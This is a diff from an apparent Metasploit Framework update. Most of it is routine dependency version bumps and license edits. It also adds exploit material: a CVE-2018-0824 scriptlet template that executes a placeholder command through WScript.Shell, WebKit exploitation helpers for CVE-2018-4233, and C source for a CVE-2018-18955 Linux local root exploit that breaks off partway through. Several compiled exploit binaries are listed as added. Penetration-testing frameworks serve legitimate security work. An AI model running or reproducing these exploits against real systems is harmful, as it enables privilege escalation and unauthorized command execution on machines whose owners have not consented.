248
+    recog (2.1.45)
238 249
       nokogiri
239 250
     redcarpet (3.4.0)
240 251
     rex-arch (0.1.13)
241 252
       rex-text
242
-    rex-bin_tools (0.1.4)
253
+    rex-bin_tools (0.1.6)
243 254
       metasm
244 255
       rex-arch
245 256
       rex-core
@@ -250,7 +261,7 @@ GEM
250 261
       metasm
251 262
       rex-arch
252 263
       rex-text
253
-    rex-exploitation (0.1.19)
264
+    rex-exploitation (0.1.20)
254 265
       jsobfu
255 266
       metasm
256 267
       rex-arch
@@ -290,13 +301,13 @@ GEM
290 301
       rspec-mocks (~> 3.8.0)
291 302
     rspec-core (3.8.0)
292 303
       rspec-support (~> 3.8.0)
293
-    rspec-expectations (3.8.1)
304
+    rspec-expectations (3.8.2)
294 305
       diff-lcs (>= 1.2.0, < 2.0)
295 306
       rspec-support (~> 3.8.0)
296 307
     rspec-mocks (3.8.0)
297 308
       diff-lcs (>= 1.2.0, < 2.0)
298 309
       rspec-support (~> 3.8.0)
299
-    rspec-rails (3.8.0)
310
+    rspec-rails (3.8.2)
300 311
       actionpack (>= 3.0)
301 312
       activesupport (>= 3.0)
302 313
       railties (>= 3.0)
@@ -309,7 +320,7 @@ GEM
309 320
     rspec-support (3.8.0)
310 321
     ruby-macho (2.1.0)
311 322
     ruby-rc4 (0.1.5)
312
-    ruby_smb (1.0.4)
323
+    ruby_smb (1.0.5)
313 324
       bindata
314 325
       rubyntlm
315 326
       windows_error
@@ -330,19 +341,18 @@ GEM
330 341
     sqlite3 (1.3.13)
331 342
     sshkey (1.9.0)
332 343
     swagger-blocks (2.0.2)
333
-    sysrandom (1.0.5)
334 344
     thin (1.7.2)
335 345
       daemons (~> 1.0, >= 1.0.9)
336 346
       eventmachine (~> 1.0, >= 1.0.4)
337 347
       rack (>= 1, < 3)
338
-    thor (0.20.0)
348
+    thor (0.20.3)
339 349
     thread_safe (0.3.6)
340
-    tilt (2.0.8)
350
+    tilt (2.0.9)
341 351
     timecop (0.9.1)
342 352
     ttfunk (1.5.1)
343 353
     tzinfo (1.2.5)
344 354
       thread_safe (~> 0.1)
345
-    tzinfo-data (1.2018.5)
355
+    tzinfo-data (1.2018.9)
346 356
       tzinfo (>= 1.0.0)
347 357
     warden (1.2.7)
348 358
       rack (>= 1.0)
@@ -351,7 +361,7 @@ GEM
351 361
       activemodel (>= 4.2.7)
352 362
       activesupport (>= 4.2.7)
353 363
     xmlrpc (0.3.0)
354
-    yard (0.9.16)
364
+    yard (0.9.18)
355 365
 
356 366
 PLATFORMS
357 367
   ruby
@@ -367,9 +377,10 @@ DEPENDENCIES
367 377
   rspec-rails
368 378
   rspec-rerun
369 379
   simplecov
380
+  sqlite3 (~> 1.3.0)
370 381
   swagger-blocks
371 382
   timecop
372 383
   yard
373 384
 
374 385
 BUNDLED WITH
375
-   1.16.4
386
+   1.17.3

+ 1
- 5
LICENSE View File

@@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
71 71
 Copyright: 2009 Vertive, Inc.
72 72
 License: MIT
73 73
 
74
-Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
75
-Copyright: 2006-2010 Yoann GUILLOT
76
-License: LGPL-2.1
77
-
78 74
 Files: lib/msf/core/modules/external/python/async_timeout/*
79 75
 Copyright: 2016-2017 Andrew Svetlov
80 76
 License: Apache 2.0
@@ -115,7 +111,7 @@ Files: data/webcam/api.js
115 111
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
116 112
 License: MIT
117 113
 
118
-Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
114
+Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
119 115
 Copyright: Copyright 2018 SmartBear Software
120 116
 License: Apache 2.0
121 117
 

+ 74
- 73
LICENSE_GEMS View File

@@ -1,135 +1,136 @@
1 1
 This file is auto-generated by tools/dev/update_gem_licenses.sh
2 2
 Ascii85, 1.0.3, MIT
3
-actionpack, 4.2.10, MIT
4
-actionview, 4.2.10, MIT
5
-activemodel, 4.2.10, MIT
6
-activerecord, 4.2.10, MIT
7
-activesupport, 4.2.10, MIT
3
+actionpack, 4.2.11, MIT
4
+actionview, 4.2.11, MIT
5
+activemodel, 4.2.11, MIT
6
+activerecord, 4.2.11, MIT
7
+activesupport, 4.2.11, MIT
8 8
 addressable, 2.5.2, "Apache 2.0"
9 9
 afm, 0.2.2, MIT
10 10
 arel, 6.0.4, MIT
11
-arel-helpers, 2.6.1, MIT
12
-backports, 3.11.1, MIT
13
-bcrypt, 3.1.11, MIT
11
+arel-helpers, 2.8.0, MIT
12
+backports, 3.11.4, MIT
13
+bcrypt, 3.1.12, MIT
14 14
 bcrypt_pbkdf, 1.0.0, MIT
15
-bindata, 2.4.3, ruby
15
+bindata, 2.4.4, ruby
16 16
 bit-struct, 0.16, ruby
17 17
 builder, 3.2.3, MIT
18
-bundler, 1.16.1, MIT
18
+bundler, 1.17.3, MIT
19 19
 coderay, 1.1.2, MIT
20 20
 concurrent-ruby, 1.0.5, MIT
21
-crass, 1.0.3, MIT
21
+cookiejar, 0.3.3, unknown
22
+crass, 1.0.4, MIT
23
+daemons, 1.3.1, MIT
22 24
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
23
-dnsruby, 1.60.2, "Apache 2.0"
24
-docile, 1.3.0, MIT
25
+dnsruby, 1.61.2, "Apache 2.0"
26
+docile, 1.3.1, MIT
27
+ed25519, 1.2.4, MIT
28
+em-http-request, 1.1.5, MIT
29
+em-socksify, 0.3.2, MIT
25 30
 erubis, 2.7.0, MIT
26
-factory_bot, 4.8.2, MIT
27
-factory_bot_rails, 4.8.2, MIT
28
-faker, 1.8.7, MIT
29
-faraday, 0.14.0, MIT
30
-filesize, 0.1.1, MIT
31
-fivemat, 1.3.6, MIT
32
-google-protobuf, 3.5.1, "New BSD"
33
-googleapis-common-protos-types, 1.0.1, "Apache 2.0"
34
-googleauth, 0.6.2, "Apache 2.0"
35
-grpc, 1.8.3, "Apache 2.0"
31
+eventmachine, 1.2.7, "ruby, GPL-2.0"
32
+factory_bot, 5.0.0, MIT
33
+factory_bot_rails, 5.0.0, MIT
34
+faker, 1.9.1, MIT
35
+faraday, 0.15.4, MIT
36
+filesize, 0.2.0, MIT
37
+fivemat, 1.3.7, MIT
36 38
 hashery, 2.1.2, "Simplified BSD"
39
+http_parser.rb, 0.6.0, MIT
37 40
 i18n, 0.9.5, MIT
38 41
 jsobfu, 0.4.2, "New BSD"
39 42
 json, 2.1.0, ruby
40
-jwt, 2.1.0, MIT
41
-little-plugger, 1.1.4, MIT
42
-logging, 2.2.2, MIT
43
-loofah, 2.2.0, MIT
44
-memoist, 0.16.0, MIT
43
+loofah, 2.2.3, MIT
45 44
 metasm, 1.0.3, LGPL
46
-metasploit-aggregator, 1.0.0, "New BSD"
47 45
 metasploit-concern, 2.0.5, "New BSD"
48
-metasploit-credential, 2.0.13, "New BSD"
49
-metasploit-framework, 5.0.0, "New BSD"
46
+metasploit-credential, 3.0.2, "New BSD"
47
+metasploit-framework, 5.0.5, "New BSD"
50 48
 metasploit-model, 2.0.4, "New BSD"
51
-metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
52
-metasploit_data_models, 2.0.16, "New BSD"
53
-metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
54
-method_source, 0.9.0, MIT
55
-mini_portile2, 2.3.0, MIT
49
+metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
50
+metasploit_data_models, 3.0.4, "New BSD"
51
+metasploit_payloads-mettle, 0.5.4, "3-clause (or ""modified"") BSD"
52
+method_source, 0.9.2, MIT
53
+mini_portile2, 2.4.0, MIT
56 54
 minitest, 5.11.3, MIT
57 55
 mqtt, 0.5.0, MIT
58
-msgpack, 1.2.4, "Apache 2.0"
59
-multi_json, 1.13.1, MIT
56
+msgpack, 1.2.6, "Apache 2.0"
60 57
 multipart-post, 2.0.0, MIT
61 58
 nessus_rest, 0.1.6, MIT
62
-net-ssh, 4.2.0, MIT
59
+net-ssh, 5.1.0, MIT
63 60
 network_interface, 0.0.2, MIT
64
-nexpose, 7.2.0, BSD
65
-nokogiri, 1.8.2, MIT
66
-octokit, 4.8.0, MIT
67
-openssl-ccm, 1.2.1, MIT
61
+nexpose, 7.2.1, "New BSD"
62
+nokogiri, 1.10.1, MIT
63
+octokit, 4.13.0, MIT
64
+openssl-ccm, 1.2.2, MIT
68 65
 openvas-omp, 0.0.4, MIT
69
-os, 0.9.6, MIT
70 66
 packetfu, 1.1.13, BSD
71 67
 patch_finder, 1.0.2, "New BSD"
72
-pcaprub, 0.12.4, LGPL-2.1
73
-pdf-reader, 2.1.0, MIT
68
+pcaprub, 0.13.0, LGPL-2.1
69
+pdf-reader, 2.2.0, MIT
74 70
 pg, 0.20.0, "New BSD"
75 71
 pg_array_parser, 0.0.9, unknown
76
-postgres_ext, 3.0.0, MIT
77
-pry, 0.11.3, MIT
78
-public_suffix, 3.0.2, MIT
79
-rack, 1.6.9, MIT
72
+postgres_ext, 3.0.1, MIT
73
+pry, 0.12.2, MIT
74
+public_suffix, 3.0.3, MIT
75
+rack, 1.6.11, MIT
76
+rack-protection, 1.5.5, MIT
80 77
 rack-test, 0.6.3, MIT
81 78
 rails-deprecated_sanitizer, 1.0.3, MIT
82 79
 rails-dom-testing, 1.0.9, MIT
83
-rails-html-sanitizer, 1.0.3, MIT
84
-railties, 4.2.10, MIT
85
-rake, 12.3.0, MIT
80
+rails-html-sanitizer, 1.0.4, MIT
81
+railties, 4.2.11, MIT
82
+rake, 12.3.2, MIT
86 83
 rb-readline, 0.5.5, BSD
87
-recog, 2.1.18, unknown
84
+recog, 2.1.45, unknown
88 85
 redcarpet, 3.4.0, MIT
89 86
 rex-arch, 0.1.13, "New BSD"
90
-rex-bin_tools, 0.1.4, "New BSD"
87
+rex-bin_tools, 0.1.6, "New BSD"
91 88
 rex-core, 0.1.13, "New BSD"
92 89
 rex-encoder, 0.1.4, "New BSD"
93
-rex-exploitation, 0.1.17, "New BSD"
90
+rex-exploitation, 0.1.20, "New BSD"
94 91
 rex-java, 0.1.5, "New BSD"
95 92
 rex-mime, 0.1.5, "New BSD"
96 93
 rex-nop, 0.1.1, "New BSD"
97 94
 rex-ole, 0.1.6, "New BSD"
98
-rex-powershell, 0.1.77, "New BSD"
95
+rex-powershell, 0.1.79, "New BSD"
99 96
 rex-random_identifier, 0.1.4, "New BSD"
100 97
 rex-registry, 0.1.3, "New BSD"
101 98
 rex-rop_builder, 0.1.3, "New BSD"
102
-rex-socket, 0.1.10, "New BSD"
99
+rex-socket, 0.1.15, "New BSD"
103 100
 rex-sslscan, 0.1.5, "New BSD"
104 101
 rex-struct2, 0.1.2, "New BSD"
105
-rex-text, 0.2.17, "New BSD"
102
+rex-text, 0.2.21, "New BSD"
106 103
 rex-zip, 0.1.3, "New BSD"
107 104
 rkelly-remix, 0.0.7, MIT
108
-rspec, 3.7.0, MIT
109
-rspec-core, 3.7.1, MIT
110
-rspec-expectations, 3.7.0, MIT
111
-rspec-mocks, 3.7.0, MIT
112
-rspec-rails, 3.7.2, MIT
105
+rspec, 3.8.0, MIT
106
+rspec-core, 3.8.0, MIT
107
+rspec-expectations, 3.8.2, MIT
108
+rspec-mocks, 3.8.0, MIT
109
+rspec-rails, 3.8.2, MIT
113 110
 rspec-rerun, 1.1.0, MIT
114
-rspec-support, 3.7.1, MIT
115
-ruby-macho, 1.1.0, MIT
111
+rspec-support, 3.8.0, MIT
112
+ruby-macho, 2.1.0, MIT
116 113
 ruby-rc4, 0.1.5, MIT
117
-ruby_smb, 0.0.23, "New BSD"
114
+ruby_smb, 1.0.5, "New BSD"
118 115
 rubyntlm, 0.6.2, MIT
119
-rubyzip, 1.2.1, "Simplified BSD"
116
+rubyzip, 1.2.2, "Simplified BSD"
120 117
 sawyer, 0.8.1, MIT
121
-signet, 0.8.1, "Apache 2.0"
122
-simplecov, 0.16.0, MIT
118
+simplecov, 0.16.1, MIT
123 119
 simplecov-html, 0.10.2, MIT
120
+sinatra, 1.4.8, MIT
124 121
 sqlite3, 1.3.13, "New BSD"
125 122
 sshkey, 1.9.0, MIT
126
-thor, 0.20.0, MIT
123
+swagger-blocks, 2.0.2, MIT
124
+thin, 1.7.2, "GPLv2+, Ruby 1.8"
125
+thor, 0.20.3, MIT
127 126
 thread_safe, 0.3.6, "Apache 2.0"
127
+tilt, 2.0.9, MIT
128 128
 timecop, 0.9.1, MIT
129 129
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
130 130
 tzinfo, 1.2.5, MIT
131
-tzinfo-data, 1.2018.3, MIT
131
+tzinfo-data, 1.2018.9, MIT
132
+warden, 1.2.7, MIT
132 133
 windows_error, 0.1.2, BSD
133 134
 xdr, 2.0.0, "Apache 2.0"
134 135
 xmlrpc, 0.3.0, ruby
135
-yard, 0.9.12, MIT
136
+yard, 0.9.18, MIT

+ 1
- 1
config/database.yml.travis View File

@@ -14,7 +14,7 @@ development: &pgsql
14 14
   adapter: postgresql
15 15
   database: metasploit_framework_development
16 16
   username: postgres
17
-  pool: 5
17
+  pool: 25
18 18
   timeout: 5
19 19
 
20 20
 # Warning: The database defined as "test" will be erased and

+ 0
- 11
data/cpuinfo/build.sh View File

@@ -1,11 +0,0 @@
1
-#!/bin/sh
2
-
3
-gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
4
-strip cpuinfo.ia32.bin && \
5
-gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
6
-strip cpuinfo.ia64.bin && \
7
-i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
8
-strip cpuinfo.exe
9
-
10
-ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
11
-

+ 0
- 64
data/cpuinfo/cpuinfo.c View File

@@ -1,64 +0,0 @@
1
-// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
2
-
3
-/*
4
-#!/usr/bin/env ruby
5
-#    This file is part of Metasm, the Ruby assembly manipulation suite
6
-#    Copyright (C) 2006-2009 Yoann GUILLOT
7
-#
8
-#    Licence is LGPL, see LICENCE in the top-level directory
9
-
10
-
11
-#
12
-# this sample shows the compilation of a slightly more complex program
13
-# it displays in a messagebox the result of CPUID
14
-#
15
-
16
-*/
17
-
18
-#include <unistd.h>
19
-#include <stdio.h>
20
-
21
-static char *featureinfo[32] = {
22
-	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
23
-	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
24
-	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
25
-	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
26
-}, *extendinfo[32] = {
27
-	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
28
-	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
29
-	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
30
-	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
31
-};
32
-
33
-#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
34
-#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
35
-int main(void)
36
-{
37
-
38
-	unsigned long eax, ebx, ecx, edx;
39
-	unsigned long i;
40
-
41
-	cpuid(0);
42
-	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
43
-
44
-	cpuid(1);
45
-	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
46
-			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
47
-	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
48
-			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
49
-
50
-	fprintf(stdout, "FLAGS:");
51
-	for (i=0 ; i<32 ; i++)
52
-		if (edx & (1 << i))
53
-			fprintf(stdout, " %s", featureinfo[i]);
54
-
55
-	for (i=0 ; i<32 ; i++)
56
-		if (ecx & (1 << i))
57
-			fprintf(stdout, " %s", extendinfo[i]);
58
-
59
-	fprintf(stdout, "\n");
60
-	fflush(stdout);
61
-
62
-	return 0;
63
-}
64
-

BIN
data/cpuinfo/cpuinfo.exe View File


BIN
data/cpuinfo/cpuinfo.ia32.bin View File


BIN
data/cpuinfo/cpuinfo.ia64.bin View File


BIN
data/exploits/CVE-2012-6636/armeabi/libndkstager.so View File


BIN
data/exploits/CVE-2012-6636/mips/libndkstager.so View File


BIN
data/exploits/CVE-2012-6636/x86/libndkstager.so View File


BIN
data/exploits/CVE-2016-4557/suidhelper View File


BIN
data/exploits/CVE-2018-0824/UnmarshalPwn.exe View File


+ 16
- 0
data/exploits/CVE-2018-0824/script_template View File

@@ -0,0 +1,16 @@
1
+<?xml version='1.0'?>
2
+<package>
3
+<component id='giffile'>
4
+<registration
5
+	description='Dummy'
6
+	progid='giffile'
7
+	version='1.00'
8
+	remotable='True'>
9
+</registration>
10
+<script language='JScript'>
11
+<![CDATA[
12
+	var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
13
+]]>
14
+</script>
15
+</component>
16
+</package>

+ 182
- 0
data/exploits/CVE-2018-4233/int64.js View File

@@ -0,0 +1,182 @@
1
+//
2
+// Tiny module that provides big (64bit) integers.
3
+//
4
+// Copyright (c) 2016 Samuel Groß
5
+//
6
+// Requires utils.js
7
+//
8
+
9
+// Datatype to represent 64-bit integers.
10
+//
11
+// Internally, the integer is stored as a Uint8Array in little endian byte order.
12
+function Int64(v) {
13
+    // The underlying byte array.
14
+    var bytes = new Uint8Array(8);
15
+
16
+    switch (typeof v) {
17
+        case 'number':
18
+            v = '0x' + Math.floor(v).toString(16);
19
+        case 'string':
20
+            if (v.startsWith('0x'))
21
+                v = v.substr(2);
22
+            if (v.length % 2 == 1)
23
+                v = '0' + v;
24
+
25
+            var bigEndian = unhexlify(v, 8);
26
+            bytes.set(Array.from(bigEndian).reverse());
27
+            break;
28
+        case 'object':
29
+            if (v instanceof Int64) {
30
+                bytes.set(v.bytes());
31
+            } else {
32
+                if (v.length != 8)
33
+                    throw TypeError("Array must have excactly 8 elements.");
34
+                bytes.set(v);
35
+            }
36
+            break;
37
+        case 'undefined':
38
+            break;
39
+        default:
40
+            throw TypeError("Int64 constructor requires an argument.");
41
+    }
42
+
43
+    // Return a double whith the same underlying bit representation.
44
+    this.asDouble = function() {
45
+        // Check for NaN
46
+        if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
47
+            throw new RangeError("Integer can not be represented by a double");
48
+
49
+        return Struct.unpack(Struct.float64, bytes);
50
+    };
51
+
52
+    // Return a javascript value with the same underlying bit representation.
53
+    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
54
+    // due to double conversion constraints.
55
+    this.asJSValue = function() {
56
+        if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
57
+            throw new RangeError("Integer can not be represented by a JSValue");
58
+
59
+        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
60
+        this.assignSub(this, 0x1000000000000);
61
+        var res = Struct.unpack(Struct.float64, bytes);
62
+        this.assignAdd(this, 0x1000000000000);
63
+
64
+        return res;
65
+    };
66
+
67
+    // Return the underlying bytes of this number as array.
68
+    this.bytes = function() {
69
+        return Array.from(bytes);
70
+    };
71
+
72
+    // Return the byte at the given index.
73
+    this.byteAt = function(i) {
74
+        return bytes[i];
75
+    };
76
+
77
+    // Return the value of this number as unsigned hex string.
78
+    this.toString = function() {
79
+        return '0x' + hexlify(Array.from(bytes).reverse());
80
+    };
81
+
82
+    // Basic arithmetic.
83
+    // These functions assign the result of the computation to their 'this' object.
84
+
85
+    // Decorator for Int64 instance operations. Takes care
86
+    // of converting arguments to Int64 instances if required.
87
+    function operation(f, nargs) {
88
+        return function() {
89
+            if (arguments.length != nargs)
90
+                throw Error("Not enough arguments for function " + f.name);
91
+            for (var i = 0; i < arguments.length; i++)
92
+                if (!(arguments[i] instanceof Int64))
93
+                    arguments[i] = new Int64(arguments[i]);
94
+            return f.apply(this, arguments);
95
+        };
96
+    }
97
+
98
+    // this = -n (two's complement)
99
+    this.assignNeg = operation(function neg(n) {
100
+        for (var i = 0; i < 8; i++)
101
+            bytes[i] = ~n.byteAt(i);
102
+
103
+        return this.assignAdd(this, Int64.One);
104
+    }, 1);
105
+
106
+    // this = a + b
107
+    this.assignAdd = operation(function add(a, b) {
108
+        var carry = 0;
109
+        for (var i = 0; i < 8; i++) {
110
+            var cur = a.byteAt(i) + b.byteAt(i) + carry;
111
+            carry = cur > 0xff | 0;
112
+            bytes[i] = cur;
113
+        }
114
+        return this;
115
+    }, 2);
116
+
117
+    // this = a - b
118
+    this.assignSub = operation(function sub(a, b) {
119
+        var carry = 0;
120
+        for (var i = 0; i < 8; i++) {
121
+            var cur = a.byteAt(i) - b.byteAt(i) - carry;
122
+            carry = cur < 0 | 0;
123
+            bytes[i] = cur;
124
+        }
125
+        return this;
126
+    }, 2);
127
+
128
+    // this = a ^ b
129
+    this.assignXor = operation(function sub(a, b) {
130
+        for (var i = 0; i < 8; i++) {
131
+            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
132
+        }
133
+        return this;
134
+    }, 2);
135
+
136
+    // this = a & b
137
+    this.assignAnd = operation(function sub(a, b) {
138
+        for (var i = 0; i < 8; i++) {
139
+            bytes[i] = a.byteAt(i) & b.byteAt(i);
140
+        }
141
+        return this;
142
+    }, 2)
143
+}
144
+
145
+// Constructs a new Int64 instance with the same bit representation as the provided double.
146
+Int64.fromDouble = function(d) {
147
+    var bytes = Struct.pack(Struct.float64, d);
148
+    return new Int64(bytes);
149
+};
150
+
151
+// Convenience functions. These allocate a new Int64 to hold the result.
152
+
153
+// Return -n (two's complement)
154
+function Neg(n) {
155
+    return (new Int64()).assignNeg(n);
156
+}
157
+
158
+// Return a + b
159
+function Add(a, b) {
160
+    return (new Int64()).assignAdd(a, b);
161
+}
162
+
163
+// Return a - b
164
+function Sub(a, b) {
165
+    return (new Int64()).assignSub(a, b);
166
+}
167
+
168
+// Return a ^ b
169
+function Xor(a, b) {
170
+    return (new Int64()).assignXor(a, b);
171
+}
172
+
173
+// Return a & b
174
+function And(a, b) {
175
+    return (new Int64()).assignAnd(a, b);
176
+}
177
+
178
+// Some commonly used numbers.
179
+Int64.Zero = new Int64(0);
180
+Int64.One = new Int64(1);
181
+
182
+// That's all the arithmetic we need for exploiting WebKit.. :)

BIN
data/exploits/CVE-2018-4233/stage1.bin View File


+ 78
- 0
data/exploits/CVE-2018-4233/utils.js View File

@@ -0,0 +1,78 @@
1
+//
2
+// Utility functions.
3
+//
4
+// Copyright (c) 2016 Samuel Groß
5
+//
6
+
7
+// Return the hexadecimal representation of the given byte.
8
+function hex(b) {
9
+    return ('0' + b.toString(16)).substr(-2);
10
+}
11
+
12
+// Return the hexadecimal representation of the given byte array.
13
+function hexlify(bytes) {
14
+    var res = [];
15
+    for (var i = 0; i < bytes.length; i++)
16
+        res.push(hex(bytes[i]));
17
+
18
+    return res.join('');
19
+}
20
+
21
+// Return the binary data represented by the given hexdecimal string.
22
+function unhexlify(hexstr) {
23
+    if (hexstr.length % 2 == 1)
24
+        throw new TypeError("Invalid hex string");
25
+
26
+    var bytes = new Uint8Array(hexstr.length / 2);
27
+    for (var i = 0; i < hexstr.length; i += 2)
28
+        bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
29
+
30
+    return bytes;
31
+}
32
+
33
+function hexdump(data) {
34
+    if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
35
+        data = Array.from(data);
36
+
37
+    var lines = [];
38
+    for (var i = 0; i < data.length; i += 16) {
39
+        var chunk = data.slice(i, i+16);
40
+        var parts = chunk.map(hex);
41
+        if (parts.length > 8)
42
+            parts.splice(8, 0, ' ');
43
+        lines.push(parts.join(' '));
44
+    }
45
+
46
+    return lines.join('\n');
47
+}
48
+
49
+// Simplified version of the similarly named python module.
50
+var Struct = (function() {
51
+    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
52
+    var buffer      = new ArrayBuffer(8);
53
+    var byteView    = new Uint8Array(buffer);
54
+    var uint32View  = new Uint32Array(buffer);
55
+    var float64View = new Float64Array(buffer);
56
+
57
+    return {
58
+        pack: function(type, value) {
59
+            var view = type;        // See below
60
+            view[0] = value;
61
+            return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
62
+        },
63
+
64
+        unpack: function(type, bytes) {
65
+            if (bytes.length !== type.BYTES_PER_ELEMENT)
66
+                throw Error("Invalid bytearray");
67
+
68
+            var view = type;        // See below
69
+            byteView.set(bytes);
70
+            return view[0];
71
+        },
72
+
73
+        // Available types.
74
+        int8:    byteView,
75
+        int32:   uint32View,
76
+        float64: float64View
77
+    };
78
+})();

BIN
data/exploits/CVE-2018-4237/ssudo View File


BIN
data/exploits/CVE-2018-4404/stage2.dylib View File


BIN
data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe View File


BIN
data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe View File


+ 52
- 0
data/exploits/cve-2018-18955/subshell.c View File

@@ -0,0 +1,52 @@
1
+// subshell.c
2
+// author: Jann Horn
3
+// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
4
+
5
+#define _GNU_SOURCE
6
+#include <unistd.h>
7
+#include <grp.h>
8
+#include <err.h>
9
+#include <stdio.h>
10
+#include <fcntl.h>
11
+#include <sys/socket.h>
12
+#include <sys/un.h>
13
+#include <sched.h>
14
+#include <sys/wait.h>
15
+
16
+int main() {
17
+  int sync_pipe[2];
18
+  char dummy;
19
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
20
+
21
+  pid_t child = fork();
22
+  if (child == -1) err(1, "fork");
23
+  if (child == 0) {
24
+    close(sync_pipe[1]);
25
+    if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
26
+    if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
27
+
28
+    if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
29
+    execl("/bin/bash", "bash", NULL);
30
+    err(1, "exec");
31
+  }
32
+
33
+  close(sync_pipe[0]);
34
+  if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
35
+  char pbuf[100];
36
+  sprintf(pbuf, "/proc/%d", (int)child);
37
+  if (chdir(pbuf)) err(1, "chdir");
38
+  const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
39
+  int uid_map = open("uid_map", O_WRONLY);
40
+  if (uid_map == -1) err(1, "open uid map");
41
+  if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
42
+  close(uid_map);
43
+  int gid_map = open("gid_map", O_WRONLY);
44
+  if (gid_map == -1) err(1, "open gid map");
45
+  if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
46
+  close(gid_map);
47
+  if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
48
+
49
+  int status;
50
+  if (wait(&status) != child) err(1, "wait");
51
+  return 0;
52
+}

BIN
data/exploits/cve-2018-18955/subshell.out View File


+ 272
- 0
data/exploits/cve-2018-18955/subuid_shell.c View File

@@ -0,0 +1,272 @@
1
+// subuid_shell.c - Linux local root exploit for CVE-2018-18955
2
+// Exploits broken uid/gid mapping in nested user namespaces.
3
+// ---
4
+// Mostly stolen from Jann Horn's exploit:
5
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
6
+// Some code stolen from Xairy's exploits:
7
+// - https://github.com/xairy/kernel-exploits
8
+// ---
9
+// <bcoles@gmail.com>
10
+// - added auto subordinate id mapping
11
+// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
12
+
13
+#define _GNU_SOURCE
14
+
15
+#include <unistd.h>
16
+#include <fcntl.h>
17
+#include <grp.h>
18
+#include <pwd.h>
19
+#include <sched.h>
20
+#include <stdio.h>
21
+#include <sys/socket.h>
22
+#include <sys/un.h>
23
+#include <sys/wait.h>
24
+#include <stdarg.h>
25
+#include <stdlib.h>
26
+#include <string.h>
27
+#include <signal.h>
28
+#include <sys/prctl.h>
29
+
30
+#define DEBUG
31
+
32
+#ifdef DEBUG
33
+#  define dprintf printf
34
+#else
35
+#  define dprintf
36
+#endif
37
+
38
+char* SUBSHELL = "./subshell";
39
+
40
+
41
+// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
42
+
43
+#define CHUNK_SIZE 1024
44
+
45
+int read_file(const char* file, char* buffer, int max_length) {
46
+  int f = open(file, O_RDONLY);
47
+  if (f == -1)
48
+    return -1;
49
+  int bytes_read = 0;
50
+  while (1) {
51
+    int bytes_to_read = CHUNK_SIZE;
52
+    if (bytes_to_read > max_length - bytes_read)
53
+      bytes_to_read = max_length - bytes_read;
54
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
55
+    if (rv == -1)
56
+      return -1;
57
+    bytes_read += rv;
58
+    if (rv == 0)
59
+      return bytes_read;
60
+  }
61
+}
62
+
63
+static int write_file(const char* file, const char* what, ...) {
64
+  char buf[1024];
65
+  va_list args;
66
